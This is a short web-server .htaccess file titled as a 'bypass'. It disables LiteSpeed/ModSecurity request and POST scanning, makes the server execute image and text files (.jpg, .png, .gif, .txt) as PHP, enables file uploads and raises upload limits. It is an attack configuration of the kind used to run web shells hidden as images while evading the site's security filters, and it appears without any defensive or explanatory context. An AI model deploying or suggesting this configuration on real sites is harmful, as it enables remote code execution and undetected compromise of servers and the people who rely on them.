# MINIMAL BYPASS .HTACCESS
<IfModule LiteSpeed>
    SecFilterEngine Off
    SecFilterScanPOST Off
    SetEnv noSecScan 1
</IfModule>

RemoveHandler .php
AddHandler application/x-httpd-php .php .php* .phtml .jpg .png .gif .txt

<FilesMatch "\.(php|phtml|jpg|png)$">
    SetHandler application/x-httpd-php
</FilesMatch>

php_flag engine on
php_flag file_uploads on
php_value upload_max_filesize 50M
php_value post_max_size 55M
